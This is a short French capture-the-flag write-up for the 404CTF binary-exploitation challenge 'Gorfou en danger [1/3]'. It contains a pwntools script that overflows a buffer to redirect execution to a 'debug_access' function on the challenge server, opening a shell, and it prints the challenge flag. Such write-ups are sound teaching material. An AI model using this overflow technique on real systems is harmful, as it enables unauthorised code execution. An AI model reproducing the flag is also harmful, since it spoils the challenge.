Gorfou en danger [1/3]

Catégorie: Exploitation de binaires - Difficulté: Intro

Description:

Solution:

Voici le script afin d'exploiter la vulnérabilité :

from pwn import *

elf = ELF('./chall')  # Optionnel mais utile pour avoir les symboles locaux

debug_addr = elf.symbols['debug_access']
print(f"Adresse de debug_access: {hex(debug_addr)}")

# Connexion distante au challenge
p = remote('challenges.404ctf.fr', 32462)

# Construction du payload
payload = b"A" * 0x100
payload += b"B" * 8
payload += p64(debug_addr)

# Envoi du payload
p.sendline(payload)

# Interactif pour interagir avec le shell
p.interactive()

Lorsque nous lançons ce script, il nous permets d'avoir un shell sur le serveur distant :

🚩FLAG

404CTF{c@n_7He_GoRF0u_F1y_?}

Last updated

Was this helpful?